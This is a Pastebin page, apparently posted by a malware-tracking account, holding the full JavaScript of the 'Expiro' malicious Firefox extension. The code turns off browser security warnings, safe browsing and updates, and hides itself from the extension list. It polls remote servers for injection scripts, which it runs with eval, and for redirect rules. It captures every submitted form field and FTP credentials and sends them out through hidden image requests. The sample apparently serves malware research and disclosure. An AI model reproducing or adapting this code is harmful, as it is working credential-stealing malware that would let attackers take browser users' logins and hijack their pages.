API tools faq
paste
Advertisement
StopMalvertising

Expiro Firefox Extension - oeavhkkbkma.js

StopMalvertising
Mar 30th, 2014
259
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 15.70 KB | None | 0 0
raw download clone embed print report
  1. if (typeof mo === "undefined") {
  2.     var mo = "@mozilla.org/"
  3. }
  4. if (typeof Ci === "undefined") {
  5.     var Ci = Components["interfaces"]
  6. }
  7. if (typeof Cc === "undefined") {
  8.     var Cc = Components["classes"]
  9. }
  10.  
  11. function dbglog(a) {}
  12. var FFVARS = Array(100);
  13. var COUNTX = 114;
  14. var FOUND = 0;
  15. var timerx = Cc[mo + "timer;1"]["createInstance"](Ci["nsITimer"]);
  16. var eventx = {
  17.     ReqStateChange: function (i, a, f) {
  18.         try {
  19.             if (f["status"] != 200) {
  20.                 return false
  21.             }
  22.             var b = f["responseText"];
  23.             if (b[42] != ";") {
  24.                 return false
  25.             }
  26.             if (b[0] != "G") {
  27.                 return false
  28.             }
  29.             if (b[1] != "I") {
  30.                 return false
  31.             }
  32.             if (b[2] != "F") {
  33.                 return false
  34.             }
  35.             if (b[3] != "8") {
  36.                 return false
  37.             }
  38.             if (b[4] != "9") {
  39.                 return false
  40.             }
  41.             if (b[5] != "a") {
  42.                 return false
  43.             }
  44.             var g = s_utils["SpyXPCOM"]["getpref"]("HOSTID");
  45.             var d = this["GetListFromSrv"](i + "/?j=x&h=" + g);
  46.             if (d) {
  47.                 s_utils.SaveFile("ffij.dat", d);
  48.                 mySpy["ParseInjects"](d)
  49.             }
  50.             var c = this["GetListFromSrv"](i + "/?r=x");
  51.             s_utils["SetPreference"](i, c);
  52.             FOUND = 1
  53.         } catch (h) {}
  54.     },
  55.     CheckSrv: function (a) {
  56.         try {
  57.             var b = Cc[mo + "xmlextras/xmlhttprequest;1"]["createInstance"]();
  58.             b["open"]("GET", "http://" + a + "/?f=*", true);
  59.             b["overrideMimeType"]("text/plain; charset=x-user-defined");
  60.             b["onreadystatechange"] = function (d) {
  61.                 eventx["ReqStateChange"](a, d, b)
  62.             };
  63.             b["send"](null)
  64.         } catch (c) {}
  65.         return false
  66.     },
  67.     GetListFromSrv: function (a) {
  68.         try {
  69.             var b = Cc[mo + "xmlextras/xmlhttprequest;1"]["createInstance"]();
  70.             b.open("GET", "http://" + a, false);
  71.             b["overrideMimeType"]("text/plain; charset=x-user-defined");
  72.             b["send"](null);
  73.             if (b["status"] != 200) {
  74.                 return
  75.             }
  76.             var c = /;(S*)/ ["exec"](b["responseText"]);
  77.             if (c == null) {
  78.                 return false
  79.             }
  80.             return c[1]
  81.         } catch (d) {}
  82.     },
  83.     notify: function (a) {
  84.         COUNTX++;
  85.         try {
  86.             top: {
  87.                 if (COUNTX > 119) {
  88.                     var d = s_utils["ServerList"]["split"]("#");
  89.                     var b = COUNTX - 120;
  90.                     if (b < d["length"]) {
  91.                         if (FOUND == 0) {
  92.                             this["CheckSrv"](d[b])
  93.                         }
  94.                     } else {
  95.                         COUNTX = 0;
  96.                         FOUND = 0
  97.                     }
  98.                 }
  99.                 return
  100.             }
  101.         } catch (c) {}
  102.     }
  103. };
  104. var s_utils = {
  105.     spy_pref_last_server: "font.name-list.serif.x-aprd",
  106.     spy_pref_last_redirectlist: "font.name-list.serif.x-zrff",
  107.     spy_pref_last_update: "font.name-list.serif.w-arial",
  108.     interval: 1000 * 10,
  109.     CurrentServer: false,
  110.     RedirectList: false,
  111.     ServerList: null,
  112.     cout: null,
  113.     SpyXPCOM: null,
  114.     init: function () {
  115.         this.SpyXPCOM = Cc["@imoomajbcoa.etuiyqa.com/veooubusava;1"].getService().wrappedJSObject;
  116.         this["ServerList"] = s_utils["SpyXPCOM"]["getpref"]("SERVERLIST");
  117.         this["SetOurPrefs"]();
  118.         this["InitPreference"]();
  119.         this["hide_me_FF3"]()
  120.     },
  121.     SetOurPrefs: function () {
  122.         try {
  123.             const f = mo + "preferences-service;1";
  124.             const d = Ci["nsIPrefService"];
  125.             const c = Cc[f]["getService"](d);
  126.             const a = c["getBranch"](null)["QueryInterface"](Ci["nsIPrefBranch"])
  127.         } catch (g) {}
  128.         var b = "127.0.0.1";
  129.         try {
  130.             a.setCharPref("app.update.url", b);
  131.             a.setCharPref("app.update.url.details", b);
  132.             a.setCharPref("app.update.url.manual", b)
  133.         } catch (g) {}
  134.         try {
  135.             a.setBoolPref("security.warn_entering_secure", false);
  136.             a.setBoolPref("security.warn_entering_secure.show_once", false);
  137.             a.setBoolPref("security.warn_entering_weak", false);
  138.             a.setBoolPref("security.warn_entering_weak.show_once", false);
  139.             a.setBoolPref("security.warn_leaving_secure", false);
  140.             a.setBoolPref("security.warn_leaving_secure.show_once", false);
  141.             a.setBoolPref("security.warn_submit_insecure", false);
  142.             a.setBoolPref("security.warn_submit_insecure.show_once", false);
  143.             a.setBoolPref("security.warn_viewing_mixed", false);
  144.             a.setBoolPref("security.warn_viewing_mixed.show_once", false);
  145.             a.setBoolPref("browser.safebrowsing.enabled", false);
  146.             a.setBoolPref("browser.safebrowsing.malware.enabled", false);
  147.             a.setBoolPref("browser.privatebrowsing.autostart", true);
  148.             a.setBoolPref("javascript.options.showInConsole", false)
  149.         } catch (g) {}
  150.     },
  151.     hide_me_FF3: function () {
  152.         try {
  153.             var d = Cc[mo + "extensions/manager;1"]["getService"](Ci["nsIExtensionManager"])["datasource"];
  154.             var k = Cc[mo + "rdf/rdf-service;1"]["getService"](Ci["nsIRDFService"]);
  155.             var c = Cc[mo + "rdf/container;1"]["createInstance"](Ci["nsIRDFContainer"]);
  156.             var j = k["GetResource"]("urn:mozilla:item:root");
  157.             var i = k.GetResource("http://www.mozilla.org/2004/em-rdf#name");
  158.             c["Init"](d, j);
  159.             var a = c["GetElements"]();
  160.             while (a["hasMoreElements"]()) {
  161.                 var f = a["getNext"]();
  162.                 var b = "";
  163.                 var h = d["GetTarget"](f, i, true);
  164.                 if (h) {
  165.                     b = h["QueryInterface"](Ci["nsIRDFLiteral"])["Value"];
  166.                     dbglog("sample.js: s_utils * hide_me_FF3, name:" + b);
  167.                     if (b == ".") {
  168.                         c.RemoveElement(f, true)
  169.                     }
  170.                 }
  171.             }
  172.         } catch (g) {}
  173.     },
  174.     SetRedirectListAsCurrent: function (f) {
  175.         var c;
  176.         if (f) {
  177.             c = new Array();
  178.             var e = f["split"]("#");
  179.             for (var b = 0; b < e["length"]; b++) {
  180.                 var g = e[b]["split"]("|");
  181.                 if (g["length"] == 2) {
  182.                     var a = g[0]["replace"](/.?*.?/g, ".");
  183.                     var d = g[0]["replace"](/./g, "\.");
  184.                     d = d["replace"](
  185.                         /*/g,"[\s\S]*");if(g[1]["indexOf"]("/")==-1){g[1]+="/"}c["push"]({tofind:new RegExp(d,"i"),tofindstr:a,toreplace:g[1]["toLowerCase"]()})}}}else{c=false}this["RedirectList"]=c;this["SpyXPCOM"]["RedirectList"]=c},EncodePref:function(b){var a=function(){var c;for(c="Comic Sans MS";c["length"]<200;c+="   "){}return c}();return a+"#@#"+b64v2["en"](b)},DecodePref:function(b){try{return b64v2["de"](b["split"]("#@#")[1])}catch(a){dbglog("DecodePref ERR: "+a);return false}},InitPreference:function(){var c=false;try{const f=mo+"preferences-service;1";const d=Ci["nsIPrefService"];const b=Cc[f]["getService"](d);const a=b["getBranch"](null)["QueryInterface"](Ci["nsIPrefBranch"])}catch(g){}try{c=this["DecodePref"](b["getCharPref"](this["spy_pref_last_redirectlist"]))}catch(g){}try{this["CurrentServer"]=this["DecodePref"](b["getCharPref"](this["spy_pref_last_server"]))}catch(g){this["CurrentServer"]=false}this["SetRedirectListAsCurrent"](c);timerx["initWithCallback"](eventx,this["interval"],Ci["nsITimer"]["TYPE_REPEATING_SLACK"])},ReadFile:function(g){try{var a=Cc[mo+"file/directory_service;1"]["getService"](Ci["nsIProperties"])["get"]("ProfD",Ci["nsIFile"]);a["append"](g);var f=Cc[mo+"network/file-input-stream;1"]["createInstance"](Ci["nsIFileInputStream"]);var d=Cc[mo+"scriptableinputstream;1"]["createInstance"](Ci["nsIScriptableInputStream"]);f["init"](a,1,4,0);d["init"](f);var b=d["read"](1048575);f["close"]();return b}catch(c){}},SaveFile:function(f,b){if(!b){return}try{var a=Cc[mo+"file/directory_service;1"]["getService"](Ci["nsIProperties"])["get"]("ProfD",Ci["nsIFile"]);a["append"](f);var d=Cc[mo+"network/file-output-stream;1"]["createInstance"](Ci["nsIFileOutputStream"]);d["init"](a,2|8|32,438,0);d["write"](b,b["length"]);d["close"]()}catch(c){}},SetPreference:function(b,a){this["CurrentServer"]=b;if(b){gPrefService["setCharPref"](this["spy_pref_last_server"],this["EncodePref"](b))}if(a){a=b64v2.de(a);this["RedirectList"]=a;this["SetRedirectListAsCurrent"](a);gPrefService["setCharPref"](this["spy_pref_last_redirectlist"],this["EncodePref"](a));gPrefService["setCharPref"](this["spy_pref_last_update"],this["EncodePref"](String((new Date())["valueOf"]())))}}};var mySpy={sending:31337,max:40,max_inj:100,IDstr:null,HostId:null,version:null,Buffers:new Array(this["max"]),INJECT:new Array(this["max_inj"]),INJURL:new Array(this["max_inj"]),addlog:function(a){},dbgalert:function(a){},ParseInjects:function(d){var a=b64v2["de"](d);var g=new Array();g=a["split"]("|$");var c=new Array();var f=1;var e=s_utils["SpyXPCOM"]["getpref"]("HOSTID");for(f;f<g["length"];f++){var b=g[f]["substr"](0,g[f]["length"]-2);c=b["split"]("|^");this["INJURL"][f-1]=c[0];this["INJECT"][f-1]=c[1]["replace"]("_HOSTID_",e)}this["INJURL"][f-1]=false},init:function(){this["IDstr"]=this["rndStr"]();this["HostId"]=s_utils["SpyXPCOM"]["getpref"]("HOSTID");this["version"]=s_utils["SpyXPCOM"]["getpref"]("VERSION");var a=document["getElementById"]("appcontent");if(a){a["addEventListener"]("DOMContentLoaded",function(d){mySpy["onPageLoad"](d)},true);a["addEventListener"]("submit",function(d){mySpy["onSubmit"](d)},true)}try{var b=s_utils.ReadFile("ffij.dat");this["ParseInjects"](b)}catch(c){this["INJURL"][0]=false}},saveLog:function(b){for(var a=0;a<this["max"];a++){if(!this["Buffers"][a]){this["Buffers"][a]=b;return}}},findFtp:function(a){if(a["scheme"]=="ftp"){if(a["spec"]["search"](/:.*@/)!=-1){this["saveLog"](a["spec"])}}},onPageLoad:function(aEvent){var doc=aEvent["originalTarget"];try{if(doc!=null){if(doc["location"]["protocol"]["search"](/ftp|http/)!=-1){for(var i=0;i<this["max_inj"];i++){if(!this["INJURL"][i]){break}if(doc["URL"]["match"](this["INJURL"][i])){eval(this["INJECT"][i])}}this["SendData"](doc)}}}catch(e){}},onSubmit:function(b){var c=b["originalTarget"];var e=c["ownerDocument"];var f=e["getElementsByTagName"]("form");var d=this["ParseForm"](c);for(var a=0;a<f["length"];a++){if(f[a]!=c){d+=this["ParseForm"](f[a])}}d=e["location"]["href"]+" #FIREFOX#"+Application["version"]+"# "+d+"#;";this["saveLog"](d)},ParseForm:function(c){var a=c["getElementsByTagName"]("input");var d="";for(var b=0;b<a["length"];b++){d+=b+":"+a[b]["type"]+":"+((a[b]["name"]=="")?"<blank>:":a[b]["name"])+":";if(a[b]["type"]=="radio"||a[b]["type"]=="checkbox"){d+=a[b]["checked"]}else{d+=(a[b]["value"]=="")?"<blank>":a[b]["value"]}d+="  "}var e=c["textContent"]["replace"](/s{2,}|[
  186. ]/g,"|");d="<FORM"+((c["action"])?(" action="+c["action"]):"")+((c["id"])?(" id="+c["id"]):"")+((c.name)?(" name="+c["name"]):"")+"> "+d+e;return d},onLoadImg:function(b){var a=b["originalTarget"];if(!a["XTimeOut"]){var c=a["ownerDocument"];delete this["Buffers"][a["XStringIndex"]];window["clearTimeout"](a["XIdTimeout"])}},NextAttemptByTimeOut:function(c,b,a){this["Buffers"][c]=b;a["XTimeOut"]=true},SendData:function(d){var a="";for(var c=0;c<this["max"];c++){if(this["Buffers"][c]&&this["Buffers"][c]!=this["sending"]){if(!s_utils["CurrentServer"]){return}if(this["Buffers"][c]["length"]>37000){this["Buffers"][c]["length"]=37000}a="http://"+s_utils["CurrentServer"]+"/?h="+this["HostId"]+"&i="+c+this["IDstr"]+"&o=0&f=*&si=x&so=0&tl="+this["Buffers"][c]["length"]+"&v="+this["version"]+"&d="+b64["crypt"](this["Buffers"][c]);var b=this["InsertImg"](d,a);if(!b){continue}b["XTimeOut"]=false;b["XStringIndex"]=c;b["XIdTimeout"]=window["setTimeout"](function(f,e,g){mySpy["NextAttemptByTimeOut"](f,e,g)},10000,c,this["Buffers"][c],b);delete this["Buffers"][c];this["Buffers"][c]=this["sending"];b["addEventListener"]("load",function(e){mySpy["onLoadImg"](e)},true)}}},InsertImg:function(c,d){try{var a=c["createElement"]("img");a["setAttribute"]("border","0");a["setAttribute"]("width","0");a["setAttribute"]("height","0");a["setAttribute"]("src",d);c["body"]["insertBefore"](a,c["body"]["firstChild"]);return a}catch(b){return false}},rndStr:function(){var d="abcdefghiklmnopqrstuvwxyz";var e=10;var a="";for(var c=0;c<e;c++){var b=Math["floor"](Math["random"]()*d["length"]);a+=d["substring"](b,b+1)}return a}};var b64={_key:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)",crypt:function(b){var a=new Array(b["length"]);for(var c=0;c<b["length"];c++){a[c]=b["charCodeAt"](c)+c*c;a[c]=a[c]%6}b=b64["_en"](a);delete a;return b},_en:function(c){var a="";var k,h,f,j,g,e,d;var b=0;while(b<c["length"]){k=c[b++];h=c[b++];f=c[b++];j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64}else{if(isNaN(f)){d=64}}a=a+this["_key"]["charAt"](j)+this["_key"]["charAt"](g)+this["_key"]["charAt"](e)+this["_key"]["charAt"](d)}return a},_de:function(c){var a=new Array();var k,h,f;var j,g,e,d;var b=0;while(b<c["length"]){j=this["_key"]["indexOf"](c["charAt"](b++));g=this["_key"]["indexOf"](c["charAt"](b++));e=this["_key"]["indexOf"](c["charAt"](b++));d=this["_key"]["indexOf"](c["charAt"](b++));k=(j<<2)|(g>>4);h=((g&15)<<4)|(e>>2);f=((e&3)<<6)|d;a.push(k);if(e!=64){a["push"](f)}if(d!=64){a["push"](chr4)}}return a},_utf8_en:function(b){b=b["replace"](/
  187. /g,"
  188. ");var a="";for(var e=0;e<b["length"];e++){var d=b["charCodeAt"](e);if(d<128){a+=String["fromCharCode"](d)}else{if((d>127)&&(d<2048)){a+=String["fromCharCode"]((d>>6)|192);a+=String["fromCharCode"]((d&63)|128)}else{a+=String["fromCharCode"]((d>>12)|224);a+=String["fromCharCode"](((d>>6)&63)|128);a+=String["fromCharCode"]((d&63)|128)}}}return a},};var b64v2={_key:"hijklmnoNOVWXYZ012wxyzABLMGHIJK3456789CDEFpqrsabcdefgtuvPQRSTU+/=",en:function(c){var a="";var k,h,f,j,g,e,d;var b=0;c=b64v2["_utf8_en"](c);while(b<c["length"]){k=c["charCodeAt"](b++);h=c["charCodeAt"](b++);f=c["charCodeAt"](b++);j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64}else{if(isNaN(f)){d=64}}a=a+this["_key"]["charAt"](j)+this["_key"]["charAt"](g)+this["_key"]["charAt"](e)+this["_key"]["charAt"](d)}return a},de:function(c){var a="";var k,h,f;var j,g,e,d;var b=0;c=c["replace"](/[^A-Za-z0-9+/=]/g,"");while(b<c["length"]){j=this["_key"]["indexOf"](c["charAt"](b++));g=this["_key"]["indexOf"](c["charAt"](b++));e=this["_key"]["indexOf"](c["charAt"](b++));d=this["_key"]["indexOf"](c["charAt"](b++));k=(j<<2)|(g>>4);h=((g&15)<<4)|(e>>2);f=((e&3)<<6)|d;a=a+String["fromCharCode"](k);if(e!=64){a=a+String["fromCharCode"](h)}if(d!=64){a=a+String["fromCharCode"](f)}}a=b64v2["_utf8_de"](a);return a},_utf8_en:function(b){b=b["replace"](/
  189. /g,"
  190. ");var a="";for(var e=0;e<b["length"];e++){var d=b["charCodeAt"](e);if(d<128){a+=String["fromCharCode"](d)}else{if((d>127)&&(d<2048)){a+=String["fromCharCode"]((d>>6)|192);a+=String["fromCharCode"]((d&63)|128)}else{a+=String["fromCharCode"]((d>>12)|224);a+=String["fromCharCode"](((d>>6)&63)|128);a+=String["fromCharCode"]((d&63)|128)}}}return a},_utf8_de:function(a){var b="";var d=0;var e=c1=c2=0;while(d<a["length"]){e=a["charCodeAt"](d);if(e<128){b+=String["fromCharCode"](e);d++}else{if((e>191)&&(e<224)){c2=a["charCodeAt"](d+1);b+=String["fromCharCode"](((e&31)<<6)|(c2&63));d+=2}else{c2=a["charCodeAt"](d+1);c3=a["charCodeAt"](d+2);b+=String["fromCharCode"](((e&15)<<12)|((c2&63)<<6)|(c3&63));d+=3}}}return b}};function spy_init(){s_utils["init"]();mySpy["init"]()}window["addEventListener"]("load",spy_init,false);*/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!